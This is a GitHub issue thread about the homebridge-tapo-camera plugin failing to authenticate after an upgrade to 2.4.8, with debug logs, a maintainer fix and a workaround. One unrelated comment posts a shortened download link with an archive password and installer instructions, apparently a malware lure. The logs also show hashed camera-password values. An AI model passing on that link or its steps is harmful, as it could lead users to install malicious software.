### ISSUE TITLE
v2.4.8 password encryption error message after upgrading

### ISSUE THREAD

**Issue by chrisbudden** [kopiro/homebridge-tapo-camera#161]
**Describe The Bug:**
Password Encryption error message when starting 2.4.8

**To Reproduce:**
Upgrade to 2.4.8 and restart homebridge

**Expected behavior:**
Plugin doesn't crash

**Logs:**

[8/27/2024, 5:22:29 PM] Error: Unknown password encryption method
    at TAPOCamera.getHashedPassword (/homebridge/node_modules/homebridge-tapo-camera/src/tapoCamera.ts:113:13)
    at TAPOCamera.refreshStok (/homebridge/node_modules/homebridge-tapo-camera/src/tapoCamera.ts:210:28)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)

**Plugin Config:**

```json
{
    "cameras": [
        {
            "name": "Garden",
            "ipAddress": "192.168.$.$",
            "password": "$",
            "streamUser": "$",
            "streamPassword": "$",
            "disableNotificationsToggleAccessory": false
        }
    ],
    "platform": "tapo-camera"
}
```

**Screenshots:**

**Environment:**
Ubuntu Jammy (22.04.3 LTS)
* **Plugin Version**: 2.4.8
* **Homebridge Version**: v1.8.4
* **Node.js Version**:v20.9.0 
* **NPM Version**: 
* **Operating System**: Ubuntu Jammy (22.04.3 LTS)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by kopiro** [comment]
Enable homebridge in debug mode and repost your logs, thanks

**Comment by kopiro** [comment]
Fixed in https://github.com/kopiro/homebridge-tapo-camera/releases/tag/v2.4.9

**Comment by chrisbudden** [comment]
Thanks @kopiro  - i'm getting the 'invalid device confirm' error now - i believe that's not something you can fix right now? 

What's odd is that it was working fine up to yesterday and I hadn't changed the firmware version.

**Comment by chrisbudden** [comment]
@kopiro I gathered some more logs - let me know if this is the same issue or should be reported as different, or I should RTFM..

 `[8/28/2024, 7:42:26 PM] [tapo-camera/Garden] **Invalid device confirm, expected "sha256" or "md5" to match, but none found** {
  hashedNoncesWithMD5: '###',
  hashedNoncesWithSHA256: '###',
  deviceConfirm: '###',
  nonce: '###',
  cnonce: TAPOCamera {
    log: {
      info: [Function: info],
      success: [Function: success],
      warn: [Function: warn],
      error: [Function: error],
      debug: [Function: debug],
      log: [Function: log],
      prefix: 'tapo-camera/Garden'
    },
    config: {
      name: 'Garden',
      ipAddress: '###,
      password: '###',
      streamUser: '###',
      streamPassword: '###',
      disableNotificationsToggleAccessory: false
    },
    events: undefined,
    device: undefined,
    kOnvifPort: 2020,
    kStreamPort: 554,
    fetchAgent: Agent {
      _events: [Object: null prototype] {},
      _eventsCount: 0,
      _maxListeners: undefined,
      [Symbol(shapeMode)]: false,
      [Symbol(kCapture)]: false,
      [Symbol(nodejs.stream.destroyed)]: false,
      [Symbol(onDestroyed)]: null,
      [Symbol(closed)]: false,
      [Symbol(onClosed)]: [],
      [Symbol(dispatch interceptors)]: [Array],
      [Symbol(options)]: [Object],
      [Symbol(maxRedirections)]: 0,
      [Symbol(factory)]: [Function: defaultFactory],
      [Symbol(clients)]: [Map],
      [Symbol(onDrain)]: [Function (anonymous)],
      [Symbol(onConnect)]: [Function (anonymous)],
          [Symbol(onDisconnect)]: [Function (anonymous)],
      [Symbol(onConnectionError)]: [Function (anonymous)],
      [Symbol(Intercepted Dispatch)]: [Function: Intercept]
    },
    hashedPassword: 'D62907BBA49227DDB0A80C1353B0858C',
    hashedSha256Password: '5AAA1CED80EC178184B4951CDC05B1E94065E92AEDD950A893FF78200217B205',
    passwordEncryptionMethod: null,
    isSecureConnectionValue: true,
    stokPromise: [Function (anonymous)],
    cnonce: '96797666273F10DA',
    lsk: undefined,
    ivb: undefined,
    seq: undefined,
    stok: undefined,
    pendingAPIRequests: Map(1) {
      '{"method":"multipleRequest","params":{"requests":[{"method":"getDeviceInfo","params":{"device_info":{"name":["basic_info"]}}}]}}' => [Promise]
    }
  }
}
[8/28/2024, 7:42:26 PM] [tapo-camera/Garden] refreshStock: Invalid device confirm, retrying: 0/2. 200 {
  result: {
    data: {
      code: -40401,
      time: 8,
      max_time: 10,
      encrypt_type: [Array],
      key: '###',
      nonce: '###',
      device_confirm: '###'
    }
  },
  error_code: -40413
}`

**Comment by kopiro** [comment]
Hey @chrisbudden , do you think you can try this plugin in Python and see if you can connect via their scripts? https://github.com/JurajNyiri/pytapo

They do an awesome job and most of my code is imported from their, but I may have missed something - if it works with their scripts, I'll re-check again.

**Comment by chrisbudden** [comment]
Hey - i've tried this - i get this error (either using my credentials I created, or the credentials in the readme)

>>> tapo = Tapo(host, user, password)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 86, in __init__
    self.basicInfo = self.getBasicInfo()
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 1074, in getBasicInfo
    return self.executeFunction(
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 491, in executeFunction
    data = self.performRequest(
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 532, in performRequest
    self.ensureAuthenticated()
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 108, in ensureAuthenticated
    return self.refreshStok()
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 418, in refreshStok
    return self.refreshStok(loginRetryCount)
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 418, in refreshStok
    return self.refreshStok(loginRetryCount)
  File "/home/chrisbudden/.local/lib/python3.10/site-packages/pytapo/__init__.py", line 423, in refreshStok
    raise Exception("Invalid authentication data")
Exception: Invalid authentication data

**Comment by chrisbudden** [comment]
@kopiro is there any other debugging I can do before trying to firmware downgrade the camera? Thanks.

**Comment by rutcreate** [comment]
@chrisbudden Did you find any solution or work around for this?

**Comment by chrisbudden** [comment]
@rutcreate i am using the ffmpeg home bridge plugin with the RSTP direct URL configured at the moment until the authentication issue is resolved. It works to show the camera feed.
